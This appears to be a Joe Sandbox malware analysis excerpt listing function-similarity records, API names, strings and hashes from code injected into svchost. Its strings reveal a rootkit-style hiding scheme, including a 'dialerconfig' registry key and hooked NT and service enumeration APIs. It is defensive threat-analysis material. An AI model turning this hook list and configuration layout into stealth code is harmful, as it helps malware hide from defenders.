                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Function similarity records (Joe Sandbox IDA Plugin): API and string identifiers per recovered function, grouped by memory dump source

Memory Dump Sources
• [A] Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true; Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
• [B] Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true; Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd

Similarity
• [A] API ID: Library$Load$AddressErrorFreeLastProc; String ID: api-ms-
• [A] API ID: ConsoleWrite$CloseCreateErrorFileHandleLast; String ID: CONOUT$
• [A] API ID: CurrentProcessProtectVirtual$HandleModule; String ID: wr
• [A] API ID: Thread$Current$Context; String ID: (none)
• [A] API ID: Heap$Process$AllocFree; String ID: dialer
• [A] API ID: Value$ErrorLast; String ID: (none)
• [A] API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen; String ID: (none)
• [A] API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread; String ID: (none)
• [A] API ID: CurrentImageNonwritableUnwind__except_validate_context_record; String ID: csm$f
• [A] API ID: CurrentImageNonwritableUnwind__except_validate_context_record; String ID: csm$f
• [A] API ID: FinalHandleNamePathlstrlen; String ID: \\?\
• [A] API ID: AddressFreeHandleLibraryModuleProc; String ID: CorExitProcess$mscoree.dll
• [A] API ID: CombinePath; String ID: \\.\pipe\
• [A] API ID: CurrentThread; String ID: (none)
• [A] API ID: CurrentThread; String ID: (none)
• [A] API ID: _set_statfp; String ID: (none)
• [B] API ID: _set_statfp; String ID: (none)
• [B] API ID: _invalid_parameter_noinfo; String ID: Tuesday$Wednesday$or copy constructor iterator'
• [A] API ID: CallEncodePointerTranslator; String ID: MOC$RCC
• [A] API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record; String ID: csm$csm
• [B] API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record; String ID: csm$csm
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90
                                                                          Control-flow Graph
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750
                                                                          Control-flow Graph
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200
                                                                          Control-flow Graph
                                                                          APIs
                                                                            • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                            • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                          • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                          • SleepEx.KERNELBASE ref: 000001F28C931ADD
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID:
• String ID: dialer
• API String ID: 0-3528709123
• Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
• Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
• Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
• Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
• Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
• Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
• Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction ID: 5ddfa2ae8d86f9d74b9217bdca104cd19bacd61b75c306f4a54b144b8a2605f5
• Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction Fuzzy Hash: A3B16776250ED286EB698F35D4417F963E5FB44BC4F4860B6EE0997BA6EB35C880C340
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
• Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
• Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
• Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
• Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350

Control-flow Graph

Memory Dump Source
• Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
